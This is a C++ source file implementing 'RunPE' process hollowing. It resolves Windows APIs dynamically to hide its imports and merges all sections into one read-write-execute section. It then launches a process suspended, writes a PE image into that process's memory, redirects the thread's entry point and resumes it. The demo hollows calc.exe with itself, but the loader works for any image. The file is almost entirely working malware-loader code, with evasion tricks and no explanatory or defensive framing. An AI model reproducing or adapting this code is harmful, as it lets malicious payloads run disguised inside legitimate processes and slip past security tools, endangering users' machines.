#pragma once#include <string>#include <windows.h>#include "winapi.h"#pragma

1. #pragma once
2. #include <string>
3. #include <windows.h>
4. #include "winapi.h"
5. #pragma once
6.  
7.  
8.  
9.  
10. // Merge all sections into single.
11. #pragma comment(linker, "/merge:.CRT=.text")
12. #pragma comment(linker, "/merge:.data=.text")
13. #pragma comment(linker, "/merge:.rdata=.text")
14.  
15. // Makes all sections readable and writable.
16. #pragma comment(linker, "/section:.text,EWR")
17.  
18.  
19.  
20.  
21.  
22.  
23. //#define LOG(X) OutputDebugStringA(X)
24. #define LOG(X) ;
25.  
26.  
27.  
28. void *operator new[](size_t s) {
29. auto _alloc = Win32::GetKernel32Function<decltype(&VirtualAlloc)>("VirtualAlloc");
30. return _alloc(NULL, s, MEM_COMMIT, PAGE_READWRITE);
31. }
32.  
33. void operator delete[](void *p) {
34. auto _free = Win32::GetKernel32Function<decltype(&VirtualFree)>("VirtualFree");
35. _free(p, 0, MEM_RELEASE);
36. }
37.  
38.  
39.  
40.  
41.  
42.  
43. decltype(&GetModuleFileNameA) _GetModuleFileNameA;
44. decltype(&CreateProcessA) _CreateProcessA;
45. decltype(&GetThreadContext) _GetThreadContext;
46. decltype(&SetThreadContext) _SetThreadContext;
47. decltype(&ReadProcessMemory) _ReadProcessMemory;
48. decltype(&VirtualAlloc) _VirtualAlloc;
49. decltype(&VirtualAllocEx) _VirtualAllocEx;
50. decltype(&WriteProcessMemory) _WriteProcessMemory;
51. decltype(&ResumeThread) _ResumeThread;
52. decltype(&memset) _memset;
53. decltype(&CloseHandle) _CloseHandle;
54. decltype(&CreateFileA) _CreateFile;
55. decltype(&GetFileSize) _GetFileSize;
56. decltype(&ReadFile) _ReadFile;
57. decltype(&GetModuleHandleA) _GetModuleHandle;
58. decltype(&TerminateProcess) _TerminateProcess;
59. decltype(&GetCurrentProcess) _GetCurrentProcess;
60.  
61.  
62. void initApis() {
63.  
64. _GetModuleFileNameA = Win32::GetKernel32Function<decltype(&GetModuleFileNameA)>("GetModuleFileNameA");
65.  
66. _CreateProcessA = Win32::GetKernel32Function<decltype(&CreateProcessA)>("CreateProcessA");
67.  
68. _GetThreadContext = Win32::GetKernel32Function<decltype(&GetThreadContext)>("GetThreadContext");
69.  
70. _SetThreadContext = Win32::GetKernel32Function<decltype(&SetThreadContext)>("SetThreadContext");
71.  
72. _ReadProcessMemory = Win32::GetKernel32Function<decltype(&ReadProcessMemory)>("ReadProcessMemory");
73.  
74. _VirtualAlloc = Win32::GetKernel32Function<decltype(&VirtualAlloc)>("VirtualAlloc");
75.  
76. _VirtualAllocEx = Win32::GetKernel32Function<decltype(&VirtualAllocEx)>("VirtualAllocEx");
77.  
78. _WriteProcessMemory = Win32::GetKernel32Function<decltype(&WriteProcessMemory)>("WriteProcessMemory");
79.  
80. _ResumeThread = Win32::GetKernel32Function<decltype(&ResumeThread)>("ResumeThread");
81.  
82. _memset = Win32::GetNtFunction<decltype(&memset)>("memset");
83.  
84. _CloseHandle = Win32::GetKernel32Function<decltype(&CloseHandle)>("CloseHandle");
85.  
86. _CreateFile = Win32::GetKernel32Function<decltype(&CreateFileA)>("CreateFileA");
87.  
88. _GetFileSize = Win32::GetKernel32Function<decltype(&GetFileSize)>("GetFileSize");
89.  
90. _ReadFile = Win32::GetKernel32Function<decltype(&ReadFile)>("ReadFile");
91.  
92. _GetModuleHandle = Win32::GetKernel32Function<decltype(&GetModuleHandleA)>("GetModuleHandleA");
93.  
94. _TerminateProcess = Win32::GetKernel32Function<decltype(&TerminateProcess)>("TerminateProcess");
95.  
96. _GetCurrentProcess = Win32::GetKernel32Function<decltype(&GetCurrentProcess)>("GetCurrentProcess");
97.  
98.  
99. }
100.  
101. int RunPortableExecutable(void* Image, const char*path) {
102. IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
103. IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
104. IMAGE_SECTION_HEADER* SectionHeader;
105.  
106. PROCESS_INFORMATION PI;
107. STARTUPINFOA SI;
108.  
109. CONTEXT* CTX;
110.  
111. DWORD* ImageBase; //Base address of the image
112. void* pImageBase; // Pointer to the image base
113.  
114. int count;
115. char CurrentFilePath[1024];
116.  
117. DOSHeader = PIMAGE_DOS_HEADER(Image); // Initialize Variable
118. NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew); // Initialize
119.  
120. _GetModuleFileNameA(_GetModuleHandle(NULL), CurrentFilePath, 1024);
121. if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
122. {
123. _memset(&PI, 0, sizeof(PI)); // Null the memory
124. _memset(&SI, 0, sizeof(SI)); // Null the memory
125.  
126. if (_CreateProcessA(path, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) {
127. // Allocate memory for the context.
128. LOG("Creating process...\n");
129. CTX = LPCONTEXT(_VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
130. CTX->ContextFlags = CONTEXT_FULL; // Context is allocated
131.  
132. if (_GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
133. {
134. // Read instructions
135. _ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);
136.  
137. pImageBase = _VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
138. NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
139.  
140. // Write the image to the process
141. _WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
142.  
143. for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {
144. SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));
145. _WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),
146. LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
147. }
148. _WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
149.  
150. // Move address of entry point to the eax register
151. CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
152. _SetThreadContext(PI.hThread, LPCONTEXT(CTX)); // Set the context
153. if (!_ResumeThread(PI.hThread)) {
154. return 0;
155. }
156. return 0;
157. }
158. }
159. }
160. }
161.  
162.  
163.  
164. HANDLE MapFileToMemory(LPCSTR filename) {
165. LOG("MapFileToMemory...\n");
166. HANDLE hFile = _CreateFile(filename, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
167. if (hFile == INVALID_HANDLE_VALUE) {
168. LOG("CreateFile returned INVALID_HANDLE_VALUE\n");
169. return 0;
170. }
171. LOG("File created...\n");
172. DWORD dwSize = _GetFileSize(hFile, NULL);
173. void *buffer = _VirtualAlloc(NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
174.  
175. if (!buffer) {
176. _CloseHandle(hFile);
177. return 0;
178. }
179.  
180. DWORD dwRead;
181. if (!_ReadFile(hFile, buffer, dwSize, &dwRead, NULL)) {
182. return 0;
183. }
184. IMAGE_DOS_HEADER *dos_header = reinterpret_cast<IMAGE_DOS_HEADER*>(buffer);
185.  
186. LOG("MapFileToMemory OK...\n");
187. return buffer;
188. }
189.  
190. void initialize() {
191. HANDLE hHandle = MapFileToMemory("C:\\windows\\system32\\calc.exe");
192. RunPortableExecutable(hHandle, "C:\\windows\\system32\\calc.exe");
193. _TerminateProcess(_GetCurrentProcess(), 0);
194. }
195.  
196. int main() {
197. initApis();
198. initialize();
199. ExitProcess(0);
200. }